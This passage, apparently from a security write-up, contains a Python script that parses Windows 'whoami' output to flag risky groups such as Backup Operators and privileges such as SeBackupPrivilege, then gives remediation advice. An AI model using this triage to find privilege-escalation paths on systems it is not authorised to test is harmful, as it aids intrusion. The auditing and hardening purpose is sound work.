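    """(kind, name, why) findings for risky groups and privileges."""
    findings = []
    for row in parse_whoami_table(groups_text):
        if row["SID"] in RISKY_GROUPS:
            findings.append(("group", row["Group Name"], RISKY_GROUPS[row["SID"]]))
    for row in parse_whoami_table(priv_text):
        name = row["Privilege Name"]
        if name in RISKY_PRIVS:
            # A "Disabled" state still counts: the holder can enable it in-process.
            findings.append(("privilege", f"{name} ({row['State']})", RISKY_PRIVS[name]))
    return findings


def _table(title, headers, rows, widths):
    """Constructed sample builder reproducing whoami's layout (title, dashes,
    blank line, header, '=' ruler, rows padded to the widest entry)."""
    def fmt(cols):
        return " ".join(c.ljust(w) for c, w in zip(cols, widths)).rstrip()
    lines = [title, "-" * len(title), "", fmt(headers),
             " ".join("=" * w for w in widths)]
    lines += [fmt(r) for r in rows]
    return "\n".join(lines) + "\n"


ENABLED = "Mandatory group, Enabled by default, Enabled group"
GROUPS_TEXT = _table(
    "GROUP INFORMATION", ("Group Name", "Type", "SID", "Attributes"),
    [("Everyone", "Well-known group", "S-1-1-0", ENABLED),
     (r"BUILTIN\Backup Operators", "Alias", "S-1-5-32-551", ENABLED),
     (r"BUILTIN\Users", "Alias", "S-1-5-32-545", ENABLED),
     (r"BUILTIN\Remote Management Users", "Alias", "S-1-5-32-580", ENABLED),
     (r"BABY\it", "Group", "S-1-5-21-1407081343-4001094062-1444647654-1109", ENABLED),
     (r"Mandatory Label\High Mandatory Level", "Label", "S-1-16-12288", "")],
    (42, 16, 46, 50))
PRIV_TEXT = _table(
    "PRIVILEGES INFORMATION", ("Privilege Name", "Description", "State"),
    [("SeMachineAccountPrivilege", "Add workstations to domain", "Enabled"),
     ("SeBackupPrivilege", "Back up files and directories", "Enabled"),
     ("SeRestorePrivilege", "Restore files and directories", "Enabled"),
     ("SeShutdownPrivilege", "Shut down the system", "Enabled"),
     ("SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"),
     ("SeIncreaseWorkingSetPrivilege", "Increase a process working set", "Enabled")],
    (29, 30, 7))

if __name__ == "__main__":
    for kind, name, why in triage(GROUPS_TEXT, PRIV_TEXT):
        print(f"[{kind}] {name}: {why}")
```

On the defensive side the same two findings are the remediation list: membership of Backup Operators on a domain controller is equivalent to the ability to read every file on it, so that group should hold only the accounts that actually run backups, and pairing it with Remote Management Users turns a local grant into one that is usable from anywhere on the network.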